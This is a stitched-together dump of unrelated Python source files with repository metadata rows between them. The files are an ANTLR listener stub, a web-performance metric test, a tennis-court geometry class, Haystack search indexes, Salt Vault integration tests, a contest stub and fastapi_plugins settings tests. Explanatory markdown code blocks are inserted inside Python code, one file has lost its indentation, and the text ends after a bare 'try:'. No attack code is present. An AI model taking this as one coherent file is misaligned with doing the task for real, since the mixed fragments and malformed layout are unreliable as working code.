    # Enter a parse tree produced by ScheduleQueryConditionParser#evaluation_period.
    def enterEvaluation_period(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#evaluation_period.
    def exitEvaluation_period(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#where.
    def enterWhere(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#where.
    def exitWhere(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#dimensions.
    def enterDimensions(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#dimensions.
    def exitDimensions(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#dimension.
    def enterDimension(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#dimension.
    def exitDimension(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#dim_separator.
    def enterDim_separator(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#dim_separator.
    def exitDim_separator(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#dim_operator.
    def enterDim_operator(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#dim_operator.
    def exitDim_operator(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#dim_val_separator.
    def enterDim_val_separator(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#dim_val_separator.
    def exitDim_val_separator(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#dim_name.
    def enterDim_name(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#dim_name.
    def exitDim_name(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#dim_values.
    def enterDim_values(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#dim_values.
    def exitDim_values(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#dim_value.
    def enterDim_value(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#dim_value.
    def exitDim_value(self, ctx):
        pass
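# Generated listeners like the one above are deliberately passive: every
# callback is `pass`, and behavior comes from subclassing plus a tree walker
# that fires `enterX`/`exitX` around each node (with antlr4 this would be
# `ParseTreeWalker().walk(listener, tree)`). A dependency-free sketch of that
# dispatch, with `Node`/`walk` as illustrative stand-ins for the real runtime
# types:

```python
class Node:
    """Minimal stand-in for a parse-tree node."""
    def __init__(self, rule, children=()):
        self.rule = rule
        self.children = children


def walk(listener, node):
    # Fire enter<Rule>, recurse into children, then exit<Rule>,
    # mirroring how ParseTreeWalker drives a listener.
    getattr(listener, "enter" + node.rule, lambda ctx: None)(node)
    for child in node.children:
        walk(listener, child)
    getattr(listener, "exit" + node.rule, lambda ctx: None)(node)


class CollectMetrics:
    """Override only the callbacks you care about."""
    def __init__(self):
        self.seen = []

    def enterMetric(self, ctx):
        self.seen.append(ctx.rule)


tree = Node("Expression", [Node("Aggregation"), Node("Metric")])
listener = CollectMetrics()
walk(listener, tree)
print(listener.seen)  # ['Metric']
```

# Unhandled rules fall through to the no-op default, which is exactly why the
# generated base class can stub every callback with `pass`.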
# ---- File: tests/metrics/test_request_per_type.py (aliariff/argus, MIT) ----
from argus.metrics.request_per_type import RequestPerType
import pytest
import tests.samples.loader as loader


class TestRequestPerType(object):
    @pytest.fixture
    def obj(self):
        obj = RequestPerType(loader.load_sample())
        return obj

    def test_measurement(self, obj):
        assert obj.measurement() == "request_per_type"

    def test_is_valid(self, obj):
        assert obj.is_valid() == True

    def test_fill(self, obj):
        # Every expected point shares the same tags except for the
        # per-type extension/media_type pair and the counted value.
        common_tags = {
            "browser": "Chrome",
            "city": "North America",
            "connection": "Cable",
            "country": "USA",
            "device": "Machine",
            "id": "180904_HF_JMH",
            "region": "Dulles",
            "website": "http://www.barenecessities.com",
        }
        expected = [
            {
                "fields": {"value": value},
                "measurement": "request_per_type",
                "tags": dict(common_tags, extension=extension, media_type=media_type),
                "time": "2018-09-04T07:36:27Z",
            }
            for value, extension, media_type in [
                (8, "html", "text"),
                (4, "css", "text"),
                (13, "javascript", "application"),
                (5, "font-woff2", "application"),
                (21, "javascript", "text"),
                (53, "webp", "image"),
                (8, "png", "image"),
                (15, "jpeg", "image"),
                (22, "gif", "image"),
                (4, "x-javascript", "application"),
                (5, "json", "application"),
                (1, "font-woff", "application"),
                (2, "plain", "text"),
                (1, "x-icon", "image"),
            ]
        ]
        assert obj.fill() == expected
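# The expected payload above is one point per (media_type, extension) pair
# with a request count. The aggregation itself can be sketched with
# `collections.Counter` (the input shape below is hypothetical; the real
# metric reads a WebPageTest-style sample):

```python
from collections import Counter

requests = [
    {"contentType": "text/html"},
    {"contentType": "text/html"},
    {"contentType": "image/webp"},
]

# Split "media/extension" content types and count occurrences of each pair.
counts = Counter(tuple(r["contentType"].split("/", 1)) for r in requests)

print(counts[("text", "html")])   # 2
print(counts[("image", "webp")])  # 1
```

# Each (media_type, extension) key would then become the tags of one
# measurement point, with the count as its value.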
# ---- File: data/tenniscourt.py (camilo-nb/Dongui-Pong, MIT) ----
import numpy as np
class TennisCourt:
    def __init__(self, length, singles_width, doubles_width, service_line_length, net_height, net_post_width, FLOOR, NEAR, SHIFT):
        self.length = length
        self.singles_width = singles_width
        self.doubles_width = doubles_width
        self.service_line_length = service_line_length
        self.net_height = net_height
        self.net_post_width = net_post_width
        self.FLOOR = FLOOR
        self.NEAR = NEAR
        self.SHIFT = SHIFT

        # see tennis_court_graph.png
        self.vertices = np.array(
            [
                #
                [-self.doubles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length, 1],
                [-self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length, 1],
                [self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length, 1],
                [self.doubles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length, 1],
                #
                [-self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2 + self.service_line_length, 1],
                [0, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2 + self.service_line_length, 1],
                [self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2 + self.service_line_length, 1],
                #
                [-self.doubles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2, 1],
                [-self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2, 1],
                [0, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2, 1],
                [self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2, 1],
                [self.doubles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2, 1],
                #
                [-self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2 - self.service_line_length, 1],
                [0, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2 - self.service_line_length, 1],
                [self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2 - self.service_line_length, 1],
                #
                [-self.doubles_width / 2, self.FLOOR, self.NEAR + self.SHIFT, 1],
                [-self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT, 1],
                [self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT, 1],
                [self.doubles_width / 2, self.FLOOR, self.NEAR + self.SHIFT, 1],
            ]
        )
        self.lines = np.array(
            [
                #[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8]#
                [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],  # 0
                [1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],  # 1
                [0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],  # 2
                [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],  # 3
                [0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],  # 4
                [0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],  # 5
                [0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],  # 6
                [1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0],  # 7
                [0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0],  # 8
                [0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],  # 9
                [0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0],  # 10
                [0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1],  # 11
                [0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0],  # 12
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0],  # 13
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0],  # 14
                [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0],  # 15
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0],  # 16
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1],  # 17
                [0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],  # 18
            ]
        )
        self.area = np.array(
            #[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8]#
            [1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1]
        )

    @classmethod
    def ITP_singles(cls, FLOOR, NEAR, SHIFT):
        """https://en.wikipedia.org/wiki/Tennis_court#Dimensions"""
        return cls(
            length=2377,
            singles_width=823,
            doubles_width=1097,
            service_line_length=640,
            net_height=107,
            net_post_width=91,
            FLOOR=FLOOR,
            NEAR=NEAR,
            SHIFT=SHIFT,
        )
aeec05604534cea6f1d76e4c801eb781074ea437 | 1,678 | py | Python | pizzaca2/certs/search_indexes.py | ffaraone/pizzaca2 | 6ecc64d34fe431f45f48e008699866ca53b3e1b0 | [
"Apache-1.1"
] | null | null | null | pizzaca2/certs/search_indexes.py | ffaraone/pizzaca2 | 6ecc64d34fe431f45f48e008699866ca53b3e1b0 | [
"Apache-1.1"
] | null | null | null | pizzaca2/certs/search_indexes.py | ffaraone/pizzaca2 | 6ecc64d34fe431f45f48e008699866ca53b3e1b0 | [
"Apache-1.1"
] | null | null | null | from haystack import indexes
from .models import Identity, Server
class IdentityIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = Identity
text = indexes.CharField(document=True, use_template=True)
country = indexes.CharField()
crl_reason = indexes.CharField()
issuer = indexes.CharField()
issuer_operators = indexes.MultiValueField()
def index_queryset(self, using=None):
"""Used when the entire index for model is updated."""
return self.get_model().objects.all()
def prepare_issuer_operators(self, obj):
return [op.pk for op in obj.issuer.operators.all()]
def prepare_issuer(self, obj):
return str(obj.issuer)
def prepare_country(self, obj):
return obj.get_C_display()
def prepare_crl_reason(self, obj):
return obj.get_crl_reason_display()
class ServerIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = Server
text = indexes.CharField(document=True, use_template=True)
country = indexes.CharField()
crl_reason = indexes.CharField()
issuer = indexes.CharField()
issuer_operators = indexes.MultiValueField()
def index_queryset(self, using=None):
"""Used when the entire index for model is updated."""
return self.get_model().objects.all()
def prepare_issuer_operators(self, obj):
return [op.pk for op in obj.issuer.operators.all()]
def prepare_issuer(self, obj):
return str(obj.issuer)
def prepare_country(self, obj):
return obj.get_C_display()
def prepare_crl_reason(self, obj):
return obj.get_crl_reason_display()
| 28.440678 | 65 | 0.690703 | 209 | 1,678 | 5.392345 | 0.244019 | 0.113576 | 0.09228 | 0.067436 | 0.908607 | 0.908607 | 0.908607 | 0.814552 | 0.814552 | 0.814552 | 0 | 0 | 0.209178 | 1,678 | 58 | 66 | 28.931034 | 0.849284 | 0.057807 | 0 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.263158 | false | 0 | 0.052632 | 0.210526 | 0.947368 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 9 |
aef91ee63ffa1db4c5032c74b4fcc876f060072d | 10,473 | py | Python | tests/integration/modules/test_vault.py | xiaohuazi123/salt | 599966292c463667db31140d276a8db8675364e5 | [
"Apache-2.0",
"MIT"
] | null | null | null | tests/integration/modules/test_vault.py | xiaohuazi123/salt | 599966292c463667db31140d276a8db8675364e5 | [
"Apache-2.0",
"MIT"
] | null | null | null | tests/integration/modules/test_vault.py | xiaohuazi123/salt | 599966292c463667db31140d276a8db8675364e5 | [
"Apache-2.0",
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Integration tests for the vault execution module
"""
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import inspect
import logging
import time
# Import Salt Libs
import salt.utils.path
from tests.support.case import ModuleCase
from tests.support.helpers import destructiveTest
from tests.support.paths import FILES
# Import Salt Testing Libs
from tests.support.unit import skipIf
log = logging.getLogger(__name__)
@destructiveTest
@skipIf(not salt.utils.path.which("dockerd"), "Docker not installed")
@skipIf(not salt.utils.path.which("vault"), "Vault not installed")
class VaultTestCase(ModuleCase):
"""
Test vault module
"""
count = 0
def setUp(self):
"""
SetUp vault container
"""
if self.count == 0:
config = '{"backend": {"file": {"path": "/vault/file"}}, "default_lease_ttl": "168h", "max_lease_ttl": "720h", "disable_mlock": true}'
self.run_state("docker_image.present", name="vault", tag="0.9.6")
self.run_state(
"docker_container.running",
name="vault",
image="vault:0.9.6",
port_bindings="8200:8200",
environment={
"VAULT_DEV_ROOT_TOKEN_ID": "testsecret",
"VAULT_LOCAL_CONFIG": config,
},
)
time.sleep(5)
ret = self.run_function(
"cmd.retcode",
cmd="/usr/local/bin/vault login token=testsecret",
env={"VAULT_ADDR": "http://127.0.0.1:8200"},
)
if ret != 0:
self.skipTest("unable to login to vault")
ret = self.run_function(
"cmd.retcode",
cmd="/usr/local/bin/vault policy write testpolicy {0}/vault.hcl".format(
FILES
),
env={"VAULT_ADDR": "http://127.0.0.1:8200"},
)
if ret != 0:
self.skipTest("unable to assign policy to vault")
        type(self).count += 1  # increment on the class, not the instance, so the counter survives across tests
def tearDown(self):
"""
TearDown vault container
"""
def count_tests(funcobj):
return inspect.ismethod(funcobj) and funcobj.__name__.startswith("test_")
numtests = len(inspect.getmembers(VaultTestCase, predicate=count_tests))
if self.count >= numtests:
self.run_state("docker_container.stopped", name="vault")
self.run_state("docker_container.absent", name="vault")
self.run_state("docker_image.absent", name="vault", force=True)
def test_write_read_secret(self):
write_return = self.run_function(
"vault.write_secret", path="secret/my/secret", user="foo", password="bar"
)
self.assertEqual(write_return, True)
assert self.run_function("vault.read_secret", arg=["secret/my/secret"]) == {
"password": "bar",
"user": "foo",
}
assert (
self.run_function("vault.read_secret", arg=["secret/my/secret", "user"])
== "foo"
)
def test_write_raw_read_secret(self):
assert (
self.run_function(
"vault.write_raw",
path="secret/my/secret2",
raw={"user2": "foo2", "password2": "bar2"},
)
is True
)
assert self.run_function("vault.read_secret", arg=["secret/my/secret2"]) == {
"password2": "bar2",
"user2": "foo2",
}
def test_delete_secret(self):
assert (
self.run_function(
"vault.write_secret",
path="secret/my/secret",
user="foo",
password="bar",
)
is True
)
assert (
self.run_function("vault.delete_secret", arg=["secret/my/secret"]) is True
)
def test_list_secrets(self):
assert (
self.run_function(
"vault.write_secret",
path="secret/my/secret",
user="foo",
password="bar",
)
is True
)
assert self.run_function("vault.list_secrets", arg=["secret/my/"]) == {
"keys": ["secret"]
}
@destructiveTest
@skipIf(not salt.utils.path.which("dockerd"), "Docker not installed")
@skipIf(not salt.utils.path.which("vault"), "Vault not installed")
class VaultTestCaseCurrent(ModuleCase):
"""
Test vault module against current vault
"""
count = 0
def setUp(self):
"""
SetUp vault container
"""
if self.count == 0:
config = '{"backend": {"file": {"path": "/vault/file"}}, "default_lease_ttl": "168h", "max_lease_ttl": "720h", "disable_mlock": true}'
self.run_state("docker_image.present", name="vault", tag="1.3.1")
self.run_state(
"docker_container.running",
name="vault",
image="vault:1.3.1",
port_bindings="8200:8200",
environment={
"VAULT_DEV_ROOT_TOKEN_ID": "testsecret",
"VAULT_LOCAL_CONFIG": config,
},
)
time.sleep(5)
ret = self.run_function(
"cmd.retcode",
cmd="/usr/local/bin/vault login token=testsecret",
env={"VAULT_ADDR": "http://127.0.0.1:8200"},
)
if ret != 0:
self.skipTest("unable to login to vault")
ret = self.run_function(
"cmd.retcode",
cmd="/usr/local/bin/vault policy write testpolicy {0}/vault.hcl".format(
FILES
),
env={"VAULT_ADDR": "http://127.0.0.1:8200"},
)
if ret != 0:
self.skipTest("unable to assign policy to vault")
        type(self).count += 1  # increment on the class, not the instance, so the counter survives across tests
def tearDown(self):
"""
TearDown vault container
"""
def count_tests(funcobj):
return inspect.ismethod(funcobj) and funcobj.__name__.startswith("test_")
numtests = len(inspect.getmembers(VaultTestCaseCurrent, predicate=count_tests))
if self.count >= numtests:
self.run_state("docker_container.stopped", name="vault")
self.run_state("docker_container.absent", name="vault")
self.run_state("docker_image.absent", name="vault", force=True)
def test_write_read_secret_kv2(self):
write_return = self.run_function(
"vault.write_secret", path="secret/my/secret", user="foo", password="bar"
)
# write_secret output:
# {'created_time': '2020-01-12T23:09:34.571294241Z', 'destroyed': False,
# 'version': 1, 'deletion_time': ''}
expected_write = {"destroyed": False, "deletion_time": ""}
self.assertDictContainsSubset(expected_write, write_return)
read_return = self.run_function(
"vault.read_secret", arg=["secret/my/secret"], metadata=True
)
# read_secret output:
# {'data': {'password': 'bar', 'user': 'foo'},
# 'metadata': {'created_time': '2020-01-12T23:07:18.829326918Z', 'destroyed': False,
# 'version': 1, 'deletion_time': ''}}
expected_read = {"data": {"password": "bar", "user": "foo"}}
self.assertDictContainsSubset(expected_read, read_return)
expected_read = {"password": "bar", "user": "foo"}
read_return = self.run_function("vault.read_secret", arg=["secret/my/secret"])
self.assertDictContainsSubset(expected_read, read_return)
read_return = self.run_function(
"vault.read_secret", arg=["secret/my/secret", "user"]
)
self.assertEqual(read_return, "foo")
def test_list_secrets_kv2(self):
write_return = self.run_function(
"vault.write_secret", path="secret/my/secret", user="foo", password="bar"
)
expected_write = {"destroyed": False, "deletion_time": ""}
self.assertDictContainsSubset(expected_write, write_return)
list_return = self.run_function("vault.list_secrets", arg=["secret/my/"])
self.assertIn("secret", list_return["keys"])
def test_write_raw_read_secret_kv2(self):
write_return = self.run_function(
"vault.write_raw",
path="secret/my/secret2",
raw={"user2": "foo2", "password2": "bar2"},
)
expected_write = {"destroyed": False, "deletion_time": ""}
self.assertDictContainsSubset(expected_write, write_return)
read_return = self.run_function(
"vault.read_secret", arg=["secret/my/secret2"], metadata=True
)
expected_read = {"data": {"password2": "bar2", "user2": "foo2"}}
self.assertDictContainsSubset(expected_read, read_return)
read_return = self.run_function("vault.read_secret", arg=["secret/my/secret2"])
expected_read = {"password2": "bar2", "user2": "foo2"}
self.assertDictContainsSubset(expected_read, read_return)
def test_delete_secret_kv2(self):
write_return = self.run_function(
"vault.write_secret",
path="secret/my/secret3",
user3="foo3",
password3="bar3",
)
expected_write = {"destroyed": False, "deletion_time": ""}
self.assertDictContainsSubset(expected_write, write_return)
delete_return = self.run_function(
"vault.delete_secret", arg=["secret/my/secret3"]
)
self.assertEqual(delete_return, True)
def test_destroy_secret_kv2(self):
write_return = self.run_function(
"vault.write_secret",
path="secret/my/secret4",
user3="foo4",
password4="bar4",
)
expected_write = {"destroyed": False, "deletion_time": ""}
self.assertDictContainsSubset(expected_write, write_return)
destroy_return = self.run_function(
"vault.destroy_secret", arg=["secret/my/secret4", "1"]
)
self.assertEqual(destroy_return, True)
# self.assertIsNone(self.run_function('vault.read_secret', arg=['secret/my/secret4']))
# list_return = self.run_function('vault.list_secrets', arg=['secret/my/'])
# self.assertNotIn('secret4', list_return['keys'])
| 35.989691 | 146 | 0.565454 | 1,111 | 10,473 | 5.138614 | 0.159316 | 0.046593 | 0.073568 | 0.084078 | 0.808022 | 0.779997 | 0.765283 | 0.75162 | 0.747767 | 0.725171 | 0 | 0.025519 | 0.296572 | 10,473 | 290 | 147 | 36.113793 | 0.749423 | 0.076673 | 0 | 0.577273 | 0 | 0.009091 | 0.247717 | 0.019733 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0.068182 | false | 0.068182 | 0.040909 | 0.009091 | 0.136364 | 0.004545 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
4e1b239089b0e0fc5489fae5e57285ea7852bc8a | 151 | py | Python | automated-competitive-programming/contest.py | dansclearov/automated-competitive-programming | 001f96a368a12a880982e0310dd3466d840577a6 | [
"MIT"
] | 1 | 2018-03-17T16:23:37.000Z | 2018-03-17T16:23:37.000Z | automated-competitive-programming/contest.py | UnlimitedUser/automated-competitive-programming | 001f96a368a12a880982e0310dd3466d840577a6 | [
"MIT"
] | null | null | null | automated-competitive-programming/contest.py | UnlimitedUser/automated-competitive-programming | 001f96a368a12a880982e0310dd3466d840577a6 | [
"MIT"
] | null | null | null | def fetch_sources(judge, contest_url_prefix): # TODO
pass
def fetch_all_tests(judge, contest_url_prefix, contest_id, sources):  # TODO: not yet implemented
    """Fetch all test cases for the given contest and submission sources."""
pass
| 21.571429 | 76 | 0.748344 | 22 | 151 | 4.772727 | 0.545455 | 0.152381 | 0.285714 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172185 | 151 | 6 | 77 | 25.166667 | 0.84 | 0.059603 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 1 | 0.5 | false | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
9d9398326d44c60b8d5e60a5c3244a36d094aa93 | 15,050 | py | Python | tests/test_settings.py | madkote/fastapi-plugins | 04d251c4c88317e1c8f35dad66771020dcb35112 | [
"MIT"
] | 211 | 2019-11-20T11:19:44.000Z | 2022-03-28T08:43:27.000Z | tests/test_settings.py | madkote/fastapi-plugins | 04d251c4c88317e1c8f35dad66771020dcb35112 | [
"MIT"
] | 16 | 2020-01-24T14:31:30.000Z | 2021-09-23T10:27:39.000Z | tests/test_settings.py | madkote/fastapi-plugins | 04d251c4c88317e1c8f35dad66771020dcb35112 | [
"MIT"
] | 12 | 2020-07-25T14:33:46.000Z | 2022-01-11T06:42:32.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# tests.test_settings
'''
:author: madkote
:contact: madkote(at)bluewin.ch
:copyright: Copyright 2021, madkote RES
tests.test_settings
-------------------
Settings tests
'''
from __future__ import absolute_import
import asyncio
import os
import unittest
import fastapi
# import pydantic
import pytest
import fastapi_plugins
from fastapi_plugins.settings import ConfigManager
from . import VERSION
from . import d2json
__all__ = []
__author__ = 'madkote <madkote(at)bluewin.ch>'
__version__ = '.'.join(str(x) for x in VERSION)
__copyright__ = 'Copyright 2021, madkote RES'
@pytest.mark.settings
class TestSettings(unittest.TestCase):
def setUp(self):
fastapi_plugins.reset_config()
fastapi_plugins.get_config.cache_clear()
def tearDown(self):
fastapi_plugins.reset_config()
fastapi_plugins.get_config.cache_clear()
def test_manager_register(self):
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = 'myconfig'
m = ConfigManager()
m.register(name, MyConfig)
exp = {name: MyConfig}
res = m._settings_map
self.assertTrue(res == exp, 'register failed')
def test_manager_reset(self):
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = 'myconfig'
m = ConfigManager()
m.register(name, MyConfig)
exp = {name: MyConfig}
res = m._settings_map
self.assertTrue(res == exp, 'register failed')
m.reset()
exp = {}
res = m._settings_map
self.assertTrue(res == exp, 'reset failed')
def test_manager_get_config(self):
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = 'myconfig'
m = ConfigManager()
m.register(name, MyConfig)
exp = {name: MyConfig}
res = m._settings_map
self.assertTrue(res == exp, 'register failed')
exp = d2json(MyConfig().dict())
res = d2json(m.get_config(name).dict())
self.assertTrue(res == exp, 'get configuration failed')
def test_manager_get_config_default(self):
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = fastapi_plugins.CONFIG_NAME_DEFAULT
m = ConfigManager()
m.register(name, MyConfig)
exp = {name: MyConfig}
res = m._settings_map
self.assertTrue(res == exp, 'register failed')
exp = d2json(MyConfig().dict())
res = d2json(m.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
def test_manager_get_config_not_existing(self):
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = 'myconfig'
m = ConfigManager()
m.register(name, MyConfig)
exp = {name: MyConfig}
res = m._settings_map
self.assertTrue(res == exp, 'register failed')
try:
m.get_config()
except fastapi_plugins.ConfigError:
pass
else:
self.fail('configuration should not exist')
def test_wrap_register_config(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
fastapi_plugins.register_config(MyConfig)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_wrap_register_config_docker(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
# docker is default
fastapi_plugins.register_config_docker(MyConfig)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
#
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(fastapi_plugins.CONFIG_NAME_DOCKER).dict()) # noqa E501
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_wrap_register_config_local(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
#
fastapi_plugins.register_config_local(MyConfig)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(fastapi_plugins.CONFIG_NAME_LOCAL).dict()) # noqa E501
self.assertTrue(res == exp, 'get configuration failed')
#
os.environ[fastapi_plugins.DEFAULT_CONFIG_ENVVAR] = fastapi_plugins.CONFIG_NAME_LOCAL # noqa E501
try:
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
os.environ.pop(fastapi_plugins.DEFAULT_CONFIG_ENVVAR)
finally:
fastapi_plugins.reset_config()
def test_wrap_register_config_test(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
#
fastapi_plugins.register_config_test(MyConfig)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(fastapi_plugins.CONFIG_NAME_TEST).dict()) # noqa E501
self.assertTrue(res == exp, 'get configuration failed')
#
os.environ[fastapi_plugins.DEFAULT_CONFIG_ENVVAR] = fastapi_plugins.CONFIG_NAME_TEST # noqa E501
try:
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
os.environ.pop(fastapi_plugins.DEFAULT_CONFIG_ENVVAR)
finally:
fastapi_plugins.reset_config()
def test_wrap_register_config_by_name(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = 'myconfig'
fastapi_plugins.register_config(MyConfig, name=name)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(name).dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_wrap_get_config(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
fastapi_plugins.register_config(MyConfig)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_wrap_get_config_by_name(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = 'myconfig'
fastapi_plugins.register_config(MyConfig, name=name)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(name).dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_wrap_reset_config(self):
try:
